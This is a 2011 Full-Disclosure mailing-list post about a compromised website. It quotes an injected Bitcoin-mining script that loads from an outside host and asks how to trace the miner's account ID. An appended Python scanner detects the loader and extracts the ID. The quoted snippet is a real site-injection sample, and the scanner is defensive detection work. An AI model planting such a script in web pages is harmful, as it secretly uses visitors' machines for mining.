[Full-disclosure] Compromised site using BitCoin

James Lay jlay at slave-tothe-box.net
Mon Dec 12 17:11:36 GMT 2011


Group,

Recently I ran across the below on a site:

<script src="hxxp://www.bitcoinplus.com/js/miner.js"
type="text/javascript"></script>
<script type="text/javascript">BitcoinPlusMiner(10215318);</script>

I know the 10215318 represents the bitcoin email, but I was curious if
there was a way to figure out what the email actually was instead of the
number above.  Would be nice to find out what email address may have been
involved in compromising the site.  Thanks for any help you may be able
to provide.

James
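
Added example, not part of the original post: a small Python scanner that checks an HTML document for the injected loader shown above and pulls out the numeric ID passed to BitcoinPlusMiner(), so the same ID can be searched for across other pages of a site. The host/path pattern and the call name are taken from the snippet in the post; the function and class names, the acceptance of the defanged hxxp scheme, and the sample page are assumptions made for this example.

```python
import re
from html.parser import HTMLParser

# Assumption: the loader is identified by the host and path seen in the post;
# the defanged "hxxp" scheme is accepted so quoted reports can be scanned too.
MINER_SRC = re.compile(r"^(?:https?|hxxps?)://(?:www\.)?bitcoinplus\.com/js/miner\.js", re.I)
MINER_CALL = re.compile(r"\bBitcoinPlusMiner\s*\(\s*(\d+)\s*\)")

class MinerScriptFinder(HTMLParser):
    """Collects miner loader tags and the IDs passed to BitcoinPlusMiner()."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.loaders = []      # (line, src) for each matching <script src=...>
        self.account_ids = []  # (line, id) for each call found inside a <script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script = True
        src = (dict(attrs).get("src") or "").strip()
        if MINER_SRC.match(src):
            self.loaders.append((self.getpos()[0], src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # ignore the call name when it is only page text
            line = self.getpos()[0]
            for m in MINER_CALL.finditer(data):
                self.account_ids.append((line + data.count("\n", 0, m.start()), m.group(1)))

def scan_html(text):
    """Return (loaders, account_ids) found in one HTML document."""
    finder = MinerScriptFinder()
    finder.feed(text)
    finder.close()
    return finder.loaders, finder.account_ids

# Constructed sample page: the snippet from the post inside a minimal document.
SAMPLE = """<html><body>
<p>BitcoinPlusMiner(1) mentioned in text is not a script call</p>
<script src="hxxp://www.bitcoinplus.com/js/miner.js"
type="text/javascript"></script>
<script type="text/javascript">BitcoinPlusMiner(10215318);</script>
</body></html>"""
```

Running scan_html() over each file in a web root lists where the loader was injected and which ID it credits; it does not resolve the ID to an account email.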



Full-Disclosure is hosted and sponsored by Secunia.